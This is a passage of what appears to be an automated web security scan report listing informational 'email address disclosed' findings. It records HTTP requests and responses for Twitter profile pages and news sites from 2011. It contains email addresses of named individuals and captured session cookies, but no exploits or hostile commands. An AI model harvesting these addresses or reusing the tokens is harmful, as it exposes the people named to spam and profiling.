X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<span class="entry-content">Join us 2DAY at 4PM for the first tasting of La Quercia Acorn Pig. Complimentary tasting and wine. RSVP to margatemondays@libertyhotel.com</span>
...[SNIP]...
</a> tonight at 4PM. Spots available! Complimentary wine and chef demonstration. RSVP to margatemondays@liberythotel.com</span>
...[SNIP]...

21.17. http://twitter.com/ShaunieONeal

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ShaunieONeal

Issue detail

The following email address was disclosed in the response:

Request

GET /ShaunieONeal HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265973-84120-54992
ETag: "f0218d983026f5440ea1c0cdd842e2ee"
Last-Modified: Sat, 29 Jan 2011 01:52:53 GMT
X-Runtime: 0.01493
Content-Type: text/html; charset=utf-8
Content-Length: 50321
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<span class="adr">Contact: info@amirahinc.com</span>
...[SNIP]...

21.18. http://twitter.com/about/contact

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /about/contact

Issue detail

The following email address was disclosed in the response:

Request

GET /about/contact HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225078-5855-53327
ETag: "ee4327c585f1140407cbc5106769d4eb"
Last-Modified: Fri, 28 Jan 2011 14:31:18 GMT
X-Runtime: 0.02946
Content-Type: text/html; charset=utf-8
Content-Length: 10974
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYzdiYmUxOThjZjIyNjY2YTgzMWVkNmZlNmEwM2Yw%250AMDI6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--da3a7d4f9fbdbbc32b992a2ee93c9facd042300f; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<a href="mailto:partner@twitter.com">
...[SNIP]...

21.19. http://twitter.com/favorites/toptweets.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /favorites/toptweets.json

Issue detail

The following email address was disclosed in the response:

Request

GET /favorites/toptweets.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1296232504372=cachebust HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129452629042599503; original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; tz_offset_sec=-21600; __utmz=43838368.1296223511.1.1.utmcsr=malsup.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1078689092.1296223511.1296223511.1296223511.1; __utmc=43838368; __utmv=43838368.lang%3A%20en; k=173.193.214.243.1296227675375304; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:35:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296232518-14489-49043
X-RateLimit-Limit: 150
ETag: "a73f7cf89a5f9d35a2a745da5eeb4d24"-gzip
Last-Modified: Fri, 28 Jan 2011 16:35:18 GMT
X-RateLimit-Remaining: 150
X-Runtime: 0.07886
X-Transaction-Mask: 0b5b266a28469a7b52ded76c9a66f018
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1296236118
Set-Cookie: _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; domain=.twitter.com; path=/
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 33965

TWTR.Widget.receiveCallback_1([{"favorited":false,"text":"Check out Smackdown tonight. Edge and I team up for the first time in 4 yrs to give a much deserved beating to Miz and Ziggler","place":null,"
...[SNIP]...
inline_media":false,"geo_enabled":false,"profile_use_background_image":true,"url":"http:\/\/imrichbroke.com","statuses_count":26139,"profile_background_color":"9AE4E8","description":"FOR BOOKING EMAIL RICHBROKEENT@GMAIL.COM","following":true,"profile_background_image_url":"http:\/\/a1.twimg.com\/profile_background_images\/21710885\/1976-_16_.jpg","location":"UP THRU DERE!","listed_count":5662,"profile_image_url":"http:\/
...[SNIP]...

21.20. http://twitter.com/j_hollender

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /j_hollender

Issue detail

The following email address was disclosed in the response:

Request

GET /j_hollender HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225016-34363-18254
ETag: "ff41031bc88714d0c96acba56a4b58e3"
Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT
X-Runtime: 0.01703
Content-Type: text/html; charset=utf-8
Content-Length: 50673
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</a> tweet somehow. Any chance it is still up for grabs? justin.hollender@gmail.com</span>
...[SNIP]...

21.21. http://twitter.com/javascripts/widgets/widget.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /javascripts/widgets/widget.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/widgets/widget.js HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:13:12 GMT
Server: Apache
Last-Modified: Fri, 28 Jan 2011 02:48:23 GMT
Accept-Ranges: bytes
Content-Length: 65153
Cache-Control: max-age=300
Expires: Fri, 28 Jan 2011 17:18:12 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/javascript

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

21.22. http://twitter.com/rachbarnhart

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /rachbarnhart

Issue detail

The following email address was disclosed in the response:

Request

GET /rachbarnhart HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:34 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225034-44205-8520
ETag: "2d3e9ea7bdf09844d1aed67d3b8c66fc"
Last-Modified: Fri, 28 Jan 2011 14:30:34 GMT
X-Runtime: 0.01426
Content-Type: text/html; charset=utf-8
Content-Length: 52627
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<span class="bio">I'm a reporter &amp; anchor at 13WHAM-TV. Rochester is my hometown. I love this city! I tweet local news &amp; items of interest. Views are my own. rbarnhart@13wham.com</span>
...[SNIP]...

21.23. http://www.berkshireeagle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.berkshireeagle.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.berkshireeagle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Sat, 29 Jan 2011 02:03:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 02:03:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=RTFIABV0BZYUKCUUCAWCFEY; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 106428

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Home'><meta name="keywords" content="Berkshire Eagle headlines"/><title>Home - Berkshire Ea
...[SNIP]...
<a href="mailto:news@berkshireeagle.com">
...[SNIP]...

21.24. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The following email address was disclosed in the response:

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244834828.1127760205.2705065472; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 28 Jan 2011 15:05:58 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31059
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm29 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:rik.robinson@platform-a.com?subject=Advertising%20With%20Black%20Voices">
...[SNIP]...

21.25. http://www.bostonherald.com/about/contact/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /about/contact/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/contact/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:10:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 35568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<a href="mailto:carfind@carfind.com">
...[SNIP]...
<a href="mailto:smcdougall@heraldinteractive.com">
...[SNIP]...
<a href="mailto:jobfind@jobfind.com">
...[SNIP]...
<a href="mailto:homedelivery@bostonherald.com,gsher@bostonherald.com,khogan@bostonherald.com?subject=Boston Herald Home Delivery">
...[SNIP]...
<a href="mailto:letterstoeditor@bostonherald.com">letterstoeditor@bostonherald.com</a>
...[SNIP]...

21.26. http://www.bostonherald.com/about/home_delivery/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /about/home_delivery/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/home_delivery/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:08:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<a href="mailto:homedelivery@bostonherald.com, gsher@bostonherald.com, khogan@bostonherald.com?subject=Boston Herald Home Delivery">
...[SNIP]...

21.27. http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:54:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/city_desk_wired/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<a href="mailto:joed@bostonherald.com">JoeD@bostonherald.com</a>
...[SNIP]...

21.28. http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/katy_on_the_campaign_trail/

Issue detail

The following email address was disclosed in the response:

Request

GET /blogs/news/katy_on_the_campaign_trail/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:52:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://bostonherald.com/blogs/news/katy_on_the_campaign_trail/xmlrpc.php
